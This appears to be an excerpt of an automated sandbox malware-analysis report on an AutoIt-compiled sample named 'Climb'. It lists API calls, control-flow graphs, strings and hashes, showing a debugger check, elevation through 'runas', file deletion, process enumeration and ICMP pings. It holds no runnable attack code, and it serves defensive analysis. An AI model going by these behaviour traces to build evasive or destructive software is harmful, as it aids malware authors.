                                                                                                                                                                          • Opcode ID: 5cae73dd5058b29d49aebfb63b42d4c2deaee97ac53901659af0e1c672fbf49f
                                                                                                                                                                          • Instruction ID: 95621cc8462a48d86a17ea300d260fc6ba4750fd6d09622e7b56f00cb63d3ff3
                                                                                                                                                                          • Opcode Fuzzy Hash: 5cae73dd5058b29d49aebfb63b42d4c2deaee97ac53901659af0e1c672fbf49f
                                                                                                                                                                          • Instruction Fuzzy Hash: D7216236628251DBD7252B71FC0EB6A7BACFF04651F440438F94BDA190EE718C10CAA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,000B3368,?), ref: 000B33BB
                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,000B3368,?), ref: 000B33CE
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00182418,00182400,?,?,?,?,?,?,000B3368,?), ref: 000B343A
                                                                                                                                                                            • Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A
                                                                                                                                                                            • Part of subcall function 000B425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000B3462,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000B42A0
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000B34BB
                                                                                                                                                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 000F3CB0
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00182418,?,?,?,?,?,?,?,000B3368,?), ref: 000F3CF1
                                                                                                                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001731F4,00182418,?,?,?,?,?,?,?,000B3368), ref: 000F3D7A
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 000F3D81
                                                                                                                                                                            • Part of subcall function 000B34D3: GetSysColorBrush.USER32(0000000F), ref: 000B34DE
                                                                                                                                                                            • Part of subcall function 000B34D3: LoadCursorW.USER32(00000000,00007F00), ref: 000B34ED
                                                                                                                                                                            • Part of subcall function 000B34D3: LoadIconW.USER32(00000063), ref: 000B3503
                                                                                                                                                                            • Part of subcall function 000B34D3: LoadIconW.USER32(000000A4), ref: 000B3515
                                                                                                                                                                            • Part of subcall function 000B34D3: LoadIconW.USER32(000000A2), ref: 000B3527
                                                                                                                                                                            • Part of subcall function 000B34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000B353F
                                                                                                                                                                            • Part of subcall function 000B34D3: RegisterClassExW.USER32(?), ref: 000B3590
                                                                                                                                                                            • Part of subcall function 000B35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000B35E1
                                                                                                                                                                            • Part of subcall function 000B35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000B3602
                                                                                                                                                                            • Part of subcall function 000B35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B3616
                                                                                                                                                                            • Part of subcall function 000B35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,000B3368,?), ref: 000B361F
                                                                                                                                                                            • Part of subcall function 000B396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000B3A3C
                                                                                                                                                                          Strings
                                                                                                                                                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 000F3CAA
                                                                                                                                                                          • AutoIt, xrefs: 000F3CA5
                                                                                                                                                                          • runas, xrefs: 000F3D75
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                          • API String ID: 683915450-2030392706
                                                                                                                                                                          • Opcode ID: d54feda8b3503868f1d291552d0a7fd4e455c28e00a1679f3cf0a8aa24a62777
                                                                                                                                                                          • Instruction ID: 238b09bd11cc08222cb0ac961bc81c2d7f477b3443c16b01d5cdc17b899ea09a
                                                                                                                                                                          • Opcode Fuzzy Hash: d54feda8b3503868f1d291552d0a7fd4e455c28e00a1679f3cf0a8aa24a62777
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A51E470208345AECB12FF60AC11DFE7BF8AB95744F14042CF591525A3DB389B89DB62

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 990 11dc54-11dc9b call bbf73 * 3 call b5851 call 11eab0 1001 11dcab-11dcdc call b568e FindFirstFileW 990->1001 1002 11dc9d-11dca6 call b6b7c 990->1002 1006 11dd4b-11dd52 FindClose 1001->1006 1007 11dcde-11dce0 1001->1007 1002->1001 1009 11dd56-11dd78 call bbd98 * 3 1006->1009 1007->1006 1008 11dce2-11dce7 1007->1008 1010 11dd26-11dd38 FindNextFileW 1008->1010 1011 11dce9-11dd24 call bbed9 call b7bb5 call b6b7c DeleteFileW 1008->1011 1010->1007 1014 11dd3a-11dd40 1010->1014 1011->1010 1025 11dd42-11dd49 FindClose 1011->1025 1014->1007 1025->1009
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000B55D1,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 000B5871
                                                                                                                                                                            • Part of subcall function 0011EAB0: GetFileAttributesW.KERNEL32(?,0011D840), ref: 0011EAB1
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011DCCB
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0011DD1B
                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0011DD2C
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0011DD43
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 0011DD4C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                          • API String ID: 2649000838-1173974218
                                                                                                                                                                          • Opcode ID: aa27b0f2e9b015c83163d15630bd562aa7977814b899a016a0a21a58814ae67f
                                                                                                                                                                          • Instruction ID: 1290232b3522705c572efbfe1687128c6053b0fe1abfe6fdf4cb5894082f109c
                                                                                                                                                                          • Opcode Fuzzy Hash: aa27b0f2e9b015c83163d15630bd562aa7977814b899a016a0a21a58814ae67f
                                                                                                                                                                          • Instruction Fuzzy Hash: 62315C31008345ABC705EF60E8919EFB7E8BF96300F404D6DF5D5921A2EB65DA49CBA3
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0011DDAC
                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0011DDBA
                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0011DDDA
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0011DE87
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                          • Opcode ID: cca48a6d9e308b864fc47efcb763191539a111ae338b42b9b15b65044ede0d63
                                                                                                                                                                          • Instruction ID: 9a066eb7bb2ffb322c39a9e8f2b81b79bc82c8ed7087d407b259fac8bdeea45a
                                                                                                                                                                          • Opcode Fuzzy Hash: cca48a6d9e308b864fc47efcb763191539a111ae338b42b9b15b65044ede0d63
                                                                                                                                                                          • Instruction Fuzzy Hash: 21318071108301AFD714EF60DC85BEFBBE8AF99750F04092DF585871A2EB719989CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetInputState.USER32 ref: 000BEF07
                                                                                                                                                                          • timeGetTime.WINMM ref: 000BF107
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000BF228
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 000BF27B
                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 000BF289
                                                                                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000BF29F
                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 000BF2B1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2189390790-0
                                                                                                                                                                          • Opcode ID: 6edd8addb62d69bb845df955dc829b10ac9ace99d246252689dffd9567884570
                                                                                                                                                                          • Instruction ID: e988ed2e98c3d0a668402fc55afb21f3a2ba7d72b2129f5bc8ce033dc798a7e5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6edd8addb62d69bb845df955dc829b10ac9ace99d246252689dffd9567884570
                                                                                                                                                                          • Instruction Fuzzy Hash: 4842E270608342EFD729DF24C884BFAB7E5BF95304F144529F5A5872A2C7B1E984CB92

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 000B3657
                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 000B3681
                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B3692
                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 000B36AF
                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B36BF
                                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 000B36D5
                                                                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B36E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                                                                                          • Opcode ID: fe7cba61ca6808e2cd98d1c70bb6cad2e7cf5e2d270be7793db9f99073885d6f
                                                                                                                                                                          • Instruction ID: 3dbfe2c30bedf2e860e0727d2439fa06bfcb336738c4e69a6f5e55cd672b3402
                                                                                                                                                                          • Opcode Fuzzy Hash: fe7cba61ca6808e2cd98d1c70bb6cad2e7cf5e2d270be7793db9f99073885d6f
                                                                                                                                                                          • Instruction Fuzzy Hash: BC21E0B5D01318AFDF01DFA4E889A9DBBB4FB09718F10511AFA11A76A0D7B44680CF90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 391 f09db-f0a0b call f07af 394 f0a0d-f0a18 call df636 391->394 395 f0a26-f0a32 call e5594 391->395 400 f0a1a-f0a21 call df649 394->400 401 f0a4b-f0a94 call f071a 395->401 402 f0a34-f0a49 call df636 call df649 395->402 412 f0cfd-f0d03 400->412 410 f0a96-f0a9f 401->410 411 f0b01-f0b0a GetFileType 401->411 402->400 414 f0ad6-f0afc GetLastError call df613 410->414 415 f0aa1-f0aa5 410->415 416 f0b0c-f0b3d GetLastError call df613 CloseHandle 411->416 417 f0b53-f0b56 411->417 414->400 415->414 420 f0aa7-f0ad4 call f071a 415->420 416->400 428 f0b43-f0b4e call df649 416->428 418 f0b5f-f0b65 417->418 419 f0b58-f0b5d 417->419 424 f0b69-f0bb7 call e54dd 418->424 425 f0b67 418->425 419->424 420->411 420->414 434 f0bb9-f0bc5 call f092b 424->434 435 f0bc7-f0beb call f04cd 424->435 425->424 428->400 434->435 442 f0bef-f0bf9 call e8a2e 434->442 440 f0bfe-f0c41 435->440 441 f0bed 435->441 444 f0c43-f0c47 440->444 445 f0c62-f0c70 440->445 441->442 442->412 444->445 447 f0c49-f0c5d 444->447 448 f0cfb 445->448 449 f0c76-f0c7a 445->449 447->445 448->412 449->448 450 f0c7c-f0caf CloseHandle call f071a 449->450 453 f0ce3-f0cf7 450->453 454 f0cb1-f0cdd GetLastError call df613 call e56a6 450->454 453->448 454->453
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000F071A: CreateFileW.KERNEL32(00000000,00000000,?,000F0A84,?,?,00000000,?,000F0A84,00000000,0000000C), ref: 000F0737
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000F0AEF
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000F0AF6
                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 000F0B02
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000F0B0C
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000F0B15
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000F0B35
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000F0C7F
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000F0CB1
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 000F0CB8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                          • String ID: H
                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                          • Opcode ID: 5128ff110b421fa3ad5a2e01912ee0776991886ae0d4c80c498e0afc0de1ac41
                                                                                                                                                                          • Instruction ID: beb771199dc82d599a6ca34e7533f33e51acf01c00397bf162c9dc89767d7560
                                                                                                                                                                          • Opcode Fuzzy Hash: 5128ff110b421fa3ad5a2e01912ee0776991886ae0d4c80c498e0afc0de1ac41
                                                                                                                                                                          • Instruction Fuzzy Hash: 20A13632A042499FDF18AF68D851BBD7BE0AB06324F14015AF911DF7A2D7319D42DB52

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 000B5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000F4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 000B55B2
                                                                                                                                                                            • Part of subcall function 000B5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000B525A
                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000B53C4
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000F4BFD
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000F4C3E
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000F4C80
                                                                                                                                                                          • _wcslen.LIBCMT ref: 000F4CE7
                                                                                                                                                                          • _wcslen.LIBCMT ref: 000F4CF6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                          • Opcode ID: e6f217d40e62c2fa3fe91e272f29b6a476d8380fdccb7f4689cb6678d0625e9b
                                                                                                                                                                          • Instruction ID: 50094eadc1033f45bf57304912bfa2c185dd4039cd4dade0286f67e31fdfa117
                                                                                                                                                                          • Opcode Fuzzy Hash: e6f217d40e62c2fa3fe91e272f29b6a476d8380fdccb7f4689cb6678d0625e9b
                                                                                                                                                                          • Instruction Fuzzy Hash: 47718C715043059BC710EF65EC819EBBBE8FF98B40F84042EF95193661EB719B89CBA1

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 000B34DE
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 000B34ED
                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 000B3503
                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 000B3515
                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 000B3527
                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000B353F
                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 000B3590
                                                                                                                                                                            • Part of subcall function 000B3624: GetSysColorBrush.USER32(0000000F), ref: 000B3657
                                                                                                                                                                            • Part of subcall function 000B3624: RegisterClassExW.USER32(00000030), ref: 000B3681
                                                                                                                                                                            • Part of subcall function 000B3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B3692
                                                                                                                                                                            • Part of subcall function 000B3624: InitCommonControlsEx.COMCTL32(?), ref: 000B36AF
                                                                                                                                                                            • Part of subcall function 000B3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B36BF
                                                                                                                                                                            • Part of subcall function 000B3624: LoadIconW.USER32(000000A9), ref: 000B36D5
                                                                                                                                                                            • Part of subcall function 000B3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B36E4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                          • Opcode ID: 5c12df827297d03e5937252bed10d4c4a2c4c3ece6ac31a03c0efbf4094487bf
                                                                                                                                                                          • Instruction ID: 59de5a4ddeb28bb78f7af10bad34bde2c739d56b26eec193d119ccad54b12334
                                                                                                                                                                          • Opcode Fuzzy Hash: 5c12df827297d03e5937252bed10d4c4a2c4c3ece6ac31a03c0efbf4094487bf
                                                                                                                                                                          • Instruction Fuzzy Hash: 61214F78D00314ABDB119FA5ED65A997FF4FB0C754F00401AFA04A6AA0C7B906C4CF90

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 532 130fb8-130fef call be6a0 535 130ff1-130ffe call bc98d 532->535 536 13100f-131021 WSAStartup 532->536 535->536 544 131000-13100b call bc98d 535->544 538 131023-131031 536->538 539 131054-131091 call cc1f6 call b8ec0 call cf9d4 inet_addr gethostbyname 536->539 541 131033 538->541 542 131036-131046 538->542 555 131093-1310a0 IcmpCreateFile 539->555 556 1310a2-1310b0 539->556 541->542 545 13104b-13104f 542->545 546 131048 542->546 544->536 550 131249-131251 545->550 546->545 555->556 557 1310d3-131100 call d017b call b423c 555->557 558 1310b2 556->558 559 1310b5-1310c5 556->559 568 131102-131129 IcmpSendEcho 557->568 569 13112b-131148 IcmpSendEcho 557->569 558->559 560 1310c7 559->560 561 1310ca-1310ce 559->561 560->561 563 131240-131244 call bbd98 561->563 563->550 570 13114c-13114e 568->570 569->570 571 131150-131155 570->571 572 1311ae-1311bc 570->572 573 13115b-131160 571->573 574 1311f8-13120a call be6a0 571->574 575 1311c1-1311c8 572->575 576 1311be 572->576 578 131162-131167 573->578 579 1311ca-1311d8 573->579 590 131210 574->590 591 13120c-13120e 574->591 577 1311e4-1311ed 575->577 576->575 583 1311f2-1311f6 577->583 584 1311ef 577->584 578->572 585 131169-13116e 578->585 581 1311da 579->581 582 1311dd 579->582 581->582 582->577 587 131212-131229 IcmpCloseHandle WSACleanup 583->587 584->583 588 131193-1311a1 585->588 589 131170-131175 585->589 587->563 595 13122b-13123d call d013d call d0184 587->595 593 1311a3 588->593 594 1311a6-1311ac 588->594 589->579 592 131177-131185 589->592 590->587 591->587 596 131187 592->596 597 13118a-131191 592->597 593->594 594->577 595->563 596->597 597->577
                                                                                                                                                                          APIs
                                                                                                                                                                          • WSAStartup.WS2_32(00000101,?), ref: 00131019
                                                                                                                                                                          • inet_addr.WSOCK32(?), ref: 00131079
                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 00131085
                                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00131093
                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00131123
                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00131142
                                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00131216
                                                                                                                                                                          • WSACleanup.WSOCK32 ref: 0013121C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                          • String ID: Ping
                                                                                                                                                                          • API String ID: 1028309954-2246546115
